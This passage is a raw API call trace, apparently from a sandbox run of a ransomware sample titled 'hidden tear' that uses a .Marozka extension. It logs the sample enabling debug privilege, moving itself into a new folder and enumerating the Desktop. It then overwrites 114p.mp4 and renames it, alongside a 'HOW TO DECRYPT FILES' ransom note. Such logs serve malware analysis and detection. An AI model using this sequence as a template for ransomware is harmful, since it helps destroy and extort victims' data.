SetWindowLongW (hWnd=0x70030, nIndex=-20, dwNewLong=589952) returned 590208 [0038.515] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x7c, wParam=0xffffffec, lParam=0x5beb24) returned 0x0 [0038.516] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x7d, wParam=0xffffffec, lParam=0x5beb24) returned 0x0 [0038.516] SetWindowPos (hWnd=0x70030, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0038.516] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x46, wParam=0x0, lParam=0x5beb3c) returned 0x0 [0038.516] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x83, wParam=0x1, lParam=0x5beb14) returned 0x0 [0038.517] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0038.518] GetWindowPlacement (in: hWnd=0x70030, lpwndpl=0x5be884 | out: lpwndpl=0x5be884) returned 1 [0038.518] GetClientRect (in: hWnd=0x70030, lpRect=0x5be830 | out: lpRect=0x5be830) returned 1 [0038.519] GetWindowTextLengthW (hWnd=0x70030) returned 11 [0038.519] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xb [0038.519] GetSystemMetrics (nIndex=42) returned 0 [0038.519] GetWindowTextW (in: hWnd=0x70030, lpString=0x5be6f0, nMaxCount=12 | out: lpString="hidden tear") returned 11 [0038.519] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0xd, wParam=0xc, lParam=0x5be6f0) returned 0xb [0038.519] GetClientRect (in: hWnd=0x70030, lpRect=0x5be738 | out: lpRect=0x5be738) returned 1 [0038.519] GetCurrentObject (hdc=0x10105d6, type=0x1) returned 0xb00017 [0038.519] GetCurrentObject (hdc=0x10105d6, type=0x2) returned 0x900010 [0038.519] GetCurrentObject (hdc=0x10105d6, type=0x7) returned 0xc05072a [0038.519] GetCurrentObject (hdc=0x10105d6, type=0x6) returned 0x8a01c2 [0038.519] SaveDC (hdc=0x10105d6) returned 1 [0038.520] GetNearestColor (hdc=0x10105d6, color=0xf0f0f0) returned 0xf0f0f0 [0038.520] CreateSolidBrush (color=0xf0f0f0) returned 0x2310019f [0038.520] FillRect (hDC=0x10105d6, lprc=0x5be5d8, hbr=0x2310019f) returned 1 [0038.520] DeleteObject (ho=0x2310019f) returned 1 [0038.520] RestoreDC (hdc=0x10105d6, nSavedDC=-1) returned 1 [0038.520] GetWindowPlacement (in: hWnd=0x70030, lpwndpl=0x5be868 | out: lpwndpl=0x5be868) returned 1 [0038.520] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x70030, Msg=0x47, wParam=0x0, lParam=0x5beb3c) returned 0x0 [0038.520] GetClientRect (in: hWnd=0x70030, lpRect=0x5be818 | out: lpRect=0x5be818) returned 1 [0038.520] GetWindowRect (in: hWnd=0x70030, lpRect=0x5be818 | out: lpRect=0x5be818) returned 1 [0038.521] RedrawWindow (hWnd=0x70030, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0038.521] GetSystemMenu (hWnd=0x70030, bRevert=0) returned 0x80227 [0038.521] GetWindowPlacement (in: hWnd=0x70030, lpwndpl=0x5beb70 | out: lpwndpl=0x5beb70) returned 1 [0038.521] EnableMenuItem (hMenu=0x80227, uIDEnableItem=0xf020, uEnable=0x0) returned 0 [0038.521] EnableMenuItem (hMenu=0x80227, uIDEnableItem=0xf030, uEnable=0x0) returned 0 [0038.521] EnableMenuItem (hMenu=0x80227, uIDEnableItem=0xf060, uEnable=0x0) returned 0 [0038.521] EnableMenuItem (hMenu=0x80227, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0038.521] EnableMenuItem (hMenu=0x80227, uIDEnableItem=0xf000, uEnable=0x0) returned 0 [0038.521] SetWindowLongW (hWnd=0x8002e, nIndex=-8, dwNewLong=458800) returned 393284 [0038.541] GetFullPathNameW (in: lpFileName="C:\\FD1HVy\\Rand123", nBufferLength=0x105, lpBuffer=0x5be6f4, lpFilePart=0x0 | out: lpBuffer="C:\\FD1HVy\\Rand123", lpFilePart=0x0) returned 0x11 [0038.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beba4) returned 1 [0038.541] GetFileAttributesExW (in: lpFileName="C:\\FD1HVy\\Rand123" (normalized: "c:\\fd1hvy\\rand123"), fInfoLevelId=0x0, lpFileInformation=0x5bec20 | out: lpFileInformation=0x5bec20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beba0) returned 1 [0038.541] GetFullPathNameW (in: lpFileName="C:\\FD1HVy\\Rand123", nBufferLength=0x105, lpBuffer=0x5be6fc, lpFilePart=0x0 | out: lpBuffer="C:\\FD1HVy\\Rand123", lpFilePart=0x0) returned 0x11 [0038.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb38) returned 1 [0038.541] GetFileAttributesExW (in: lpFileName="C:\\FD1HVy\\Rand123" (normalized: "c:\\fd1hvy\\rand123"), fInfoLevelId=0x0, lpFileInformation=0x5bebb4 | out: lpFileInformation=0x5bebb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb34) returned 1 [0038.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb38) returned 1 [0038.542] GetFileAttributesExW (in: lpFileName="C:\\FD1HVy\\Rand123" (normalized: "c:\\fd1hvy\\rand123"), fInfoLevelId=0x0, lpFileInformation=0x5bebb4 | out: lpFileInformation=0x5bebb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb34) returned 1 [0038.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb38) returned 1 [0038.542] GetFileAttributesExW (in: lpFileName="C:\\FD1HVy" (normalized: "c:\\fd1hvy"), fInfoLevelId=0x0, lpFileInformation=0x5bebb4 | out: lpFileInformation=0x5bebb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0038.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb34) returned 1 [0038.574] CreateDirectoryW (lpPathName="C:\\FD1HVy" (normalized: "c:\\fd1hvy"), lpSecurityAttributes=0x0) returned 1 [0038.575] CreateDirectoryW (lpPathName="C:\\FD1HVy\\Rand123" (normalized: "c:\\fd1hvy\\rand123"), lpSecurityAttributes=0x0) returned 1 [0038.576] GetCurrentProcessId () returned 0xd20 [0038.583] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x5be52c | out: lpLuid=0x5be52c*(LowPart=0x14, HighPart=0)) returned 1 [0038.584] GetCurrentProcess () returned 0xffffffff [0038.584] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x5be528 | out: TokenHandle=0x5be528*=0x350) returned 1 [0038.585] AdjustTokenPrivileges (in: TokenHandle=0x350, DisableAllPrivileges=0, NewState=0x263d970*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0038.585] CloseHandle (hObject=0x350) returned 1 [0038.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3621a48, Length=0x20000, ResultLength=0x5bec14 | out: SystemInformation=0x3621a48, ResultLength=0x5bec14*=0x14ae8) returned 0x0 [0038.620] CoTaskMemAlloc (cb=0x20e) returned 0xaa4180 [0038.620] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0xaa4180 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0038.620] CoTaskMemFree (pv=0xaa4180) [0038.635] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe", nBufferLength=0x105, lpBuffer=0x5be708, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe", lpFilePart=0x0) returned 0x23 [0038.635] GetFullPathNameW (in: lpFileName="C:\\FD1HVy\\Rand123\\local.exe", nBufferLength=0x105, lpBuffer=0x5be708, lpFilePart=0x0 | out: lpBuffer="C:\\FD1HVy\\Rand123\\local.exe", lpFilePart=0x0) returned 0x1b [0038.635] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bebbc) returned 1 [0038.635] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\marozka.exe"), fInfoLevelId=0x0, lpFileInformation=0x5bec38 | out: lpFileInformation=0x5bec38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1852680, ftCreationTime.dwHighDateTime=0x1d4e6cd, ftLastAccessTime.dwLowDateTime=0xc21dbd00, ftLastAccessTime.dwHighDateTime=0x1d4e6cd, ftLastWriteTime.dwLowDateTime=0xc0ec9000, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x35c00)) returned 1 [0038.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bebb8) returned 1 [0038.636] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\marozka.exe"), lpNewFileName="C:\\FD1HVy\\Rand123\\local.exe" (normalized: "c:\\fd1hvy\\rand123\\local.exe")) returned 1 [0038.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0038.689] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0038.690] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7e488 [0038.690] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.690] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.691] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.691] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.691] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.691] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.691] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.692] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.692] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.692] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.692] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.692] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.692] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.692] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.692] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.692] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.692] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.693] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.693] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.693] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.693] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.693] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.693] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.694] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.694] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.694] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.694] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.694] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.694] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.694] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.694] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.694] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.694] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.695] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.695] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.695] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.695] FindNextFileW (in: hFindFile=0xa7e488, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0038.695] FindClose (in: hFindFile=0xa7e488 | out: hFindFile=0xa7e488) returned 1 [0038.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0038.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0038.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0038.695] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0038.695] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7e408 [0038.696] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.696] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.696] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.696] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.696] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.696] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.696] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.697] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.697] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.697] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.697] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.697] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.697] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.697] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.697] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.698] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.698] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.698] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.698] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.698] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.698] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.698] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.698] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.699] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.699] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.699] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.699] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.699] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.699] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.699] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.699] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.700] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.700] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.700] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.700] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.700] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0038.700] FindNextFileW (in: hFindFile=0xa7e408, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0038.700] FindClose (in: hFindFile=0xa7e408 | out: hFindFile=0xa7e408) returned 1 [0038.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0038.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0038.710] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\114p.mp4", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\114p.mp4", lpFilePart=0x0) returned 0x20 [0038.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0038.710] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\114p.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\114p.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x350 [0038.710] GetFileType (hFile=0x350) returned 0x1 [0038.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0038.710] GetFileType (hFile=0x350) returned 0x1 [0038.710] GetFileSize (in: hFile=0x350, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x133fc [0038.712] ReadFile (in: hFile=0x350, lpBuffer=0x2666740, nNumberOfBytesToRead=0x133fc, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x2666740*, lpNumberOfBytesRead=0x5beabc*=0x133fc, lpOverlapped=0x0) returned 1 [0038.715] CloseHandle (hObject=0x350) returned 1 [0042.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x5be464, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0042.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x5be4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0042.270] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be97c) returned 1 [0042.270] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x5be9f8 | out: lpFileInformation=0x5be9f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0042.270] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be978) returned 1 [0042.701] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x5be8d4 | out: pfEnabled=0x5be8d4) returned 0x0 [0043.890] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0043.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0043.890] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0043.890] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\114p.mp4", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\114p.mp4", lpFilePart=0x0) returned 0x20 [0043.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0043.890] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\114p.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\114p.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3fc [0043.892] GetFileType (hFile=0x3fc) returned 0x1 [0043.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0043.892] GetFileType (hFile=0x3fc) returned 0x1 [0043.893] WriteFile (in: hFile=0x3fc, lpBuffer=0x2717534*, nNumberOfBytesToWrite=0x13400, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x2717534*, lpNumberOfBytesWritten=0x5beab0*=0x13400, lpOverlapped=0x0) returned 1 [0043.895] CloseHandle (hObject=0x3fc) returned 1 [0043.902] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\114p.mp4", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\114p.mp4", lpFilePart=0x0) returned 0x20 [0043.902] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\114p.mp4.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\114p.mp4.Marozka", lpFilePart=0x0) returned 0x28 [0043.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0043.903] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\114p.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\114p.mp4"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7268690, ftCreationTime.dwHighDateTime=0x1d4cd9a, ftLastAccessTime.dwLowDateTime=0xfef8a770, ftLastAccessTime.dwHighDateTime=0x1d4d1ed, ftLastWriteTime.dwLowDateTime=0xdce71862, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x13400)) returned 1 [0043.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0043.903] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\114p.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\114p.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\114p.mp4.Marozka" (normalized: 